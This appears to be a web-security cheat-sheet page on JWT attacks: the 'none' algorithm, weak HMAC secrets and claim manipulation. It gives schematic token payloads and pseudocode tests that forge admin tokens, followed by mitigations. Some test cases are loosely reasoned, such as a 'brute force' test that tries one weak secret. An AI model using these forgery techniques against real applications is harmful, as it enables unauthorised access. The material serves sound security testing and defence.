# JWT

### JWT Attacks

#### Description

JWT (JSON Web Token) attacks exploit vulnerabilities in the implementation or usage of JWTs, allowing attackers to forge tokens, manipulate claims, or perform other malicious actions.

#### Example with Scenario

**Scenario:** A web application uses JWTs for user authentication. An attacker can exploit weak signing algorithms or insecure storage to forge tokens and gain unauthorized access.

#### Payloads and Test Cases

**Payloads**

1. **None Algorithm Attack:**

   ```json
   {
     "alg": "none"
   }
   ```
2. **Brute Force HMAC Secret:**

   ```json
   {
     "header": {
       "alg": "HS256",
       "typ": "JWT"
     },
     "payload": {
       "user": "admin"
     },
     "signature": "generated_signature"
   }
   ```
3. **Claim Manipulation:**

   ```json
   {
     "header": {
       "alg": "HS256",
       "typ": "JWT"
     },
     "payload": {
       "user": "attacker",
       "admin": true
     },
     "signature": "generated_signature"
   }
   ```

**Test Cases**

1. **None Algorithm Attack:**
   * **Payload:**

     ```json
     {
       "alg": "none"
     }
     ```
   * **Test Case:**

     ```python
     # Create a JWT with the 'none' algorithm
     jwtToken = createJWT({"alg": "none"}, {"user": "admin"}, "")
     # Send the token to the server
     sendJWTToServer(jwtToken)
     # Verify if the server accepts the token without validation
     checkAdminAccessGranted()
     ```
2. **Brute Force HMAC Secret:**
   * **Payload:**

     ```json
     {
       "header": {
         "alg": "HS256",
         "typ": "JWT"
       },
       "payload": {
         "user": "admin"
       },
       "signature": "generated_signature"
     }
     ```
   * **Test Case:**

     ```python
     # Generate a JWT with a known weak secret
     jwtToken = createJWT({"alg": "HS256"}, {"user": "admin"}, "weak_secret")
     # Send the token to the server
     sendJWTToServer(jwtToken)
     # Verify if the server accepts the token
     checkAdminAccessGranted()
     ```
3. **Claim Manipulation:**
   * **Payload:**

     ```json
     {
       "header": {
         "alg": "HS256",
         "typ": "JWT"
       },
       "payload": {
         "user": "attacker",
         "admin": true
       },
       "signature": "generated_signature"
     }
     ```
   * **Test Case:**

     ```python
     # Create a JWT with manipulated claims
     jwtToken = createJWT({"alg": "HS256"}, {"user": "attacker", "admin": True}, "valid_secret")
     # Send the token to the server
     sendJWTToServer(jwtToken)
     # Verify if the server grants admin access
     checkAdminAccessGranted()
     ```

#### Mitigation

1. **Use Strong Secrets:**
   * Use strong, random secrets for signing JWTs.
   * Avoid using weak or easily guessable secrets.
2. **Validate Tokens Properly:**
   * Always validate the token signature and claims.
   * Reject tokens with invalid or missing signatures.
3. **Enforce Algorithm Constraints:**
   * Enforce the use of secure algorithms (e.g., HS256, RS256).
   * Reject tokens with the 'none' algorithm or other weak algorithms.
4. **Secure Token Storage:**
   * Store JWTs securely on the client side (e.g., HTTP-only cookies).
   * Avoid storing tokens in local storage or other insecure places.
5. **Implement Expiry and Revocation:**
   * Implement token expiry and refresh mechanisms.
   * Provide a way to revoke tokens when necessary.